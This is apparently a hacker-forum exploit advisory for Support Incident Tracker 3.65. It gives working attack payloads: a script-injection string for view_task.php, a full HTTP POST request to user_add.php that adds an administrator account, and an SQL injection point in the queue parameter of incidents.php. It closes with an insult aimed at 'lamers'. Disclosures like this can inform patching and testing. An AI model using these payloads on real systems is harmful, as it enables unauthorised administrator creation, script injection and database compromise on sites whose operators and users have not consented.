#########
# Author : L3b-r1'z
# Title : Support Incident Tracker Multiple Vulnerability
# Email : L3br1z@gmail.com
# Site : Sec4Leb.Com
# Download : http://sourceforge.net/projects/sitracker/files/stable/3.65/sit_3.65.tar.gz/download
#########
# # # # # # # # # #
# # # # #
# # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # #
# # # # # # # #
# # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # #
Xss Vuln
[+] P0c :
Open site and in b0x search put your code alert xss .
in file view_task.php?id=1
submit your xss code : <script>alert("1337day")</script>
Add Admin Vuln
[+] P0c :
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/sit-3.65/user_add.php?action=showform
Cookie: SiTsessionID=b0e72bd1560746bc60ceb71a3d836054
Content-Type: application/x-www-form-urlencoded
Content-Length: 243
realname=1337day&username=1337day&password=1337day&groupid=0&roleid=1&jobtitle=1337day&email=1337day@1337day.1337day&phone=1337day&mobile=1337day&fax=1337day&holiday_entitlement=21&startdate=&formtoken=7809f76811dc36c4920a4a4bac36d7627ff96072&submit=Add+User
you can inject the code from POST like hackbar :D
Sql Injection :
http://localhost/sit-3.65/incidents.php?user=all&queue=1&type=support
http://localhost/sit-3.65/incidents.php?user=all&queue=[SQL]&type=support
./EOE
Note : Fuck To All the Lamer'z .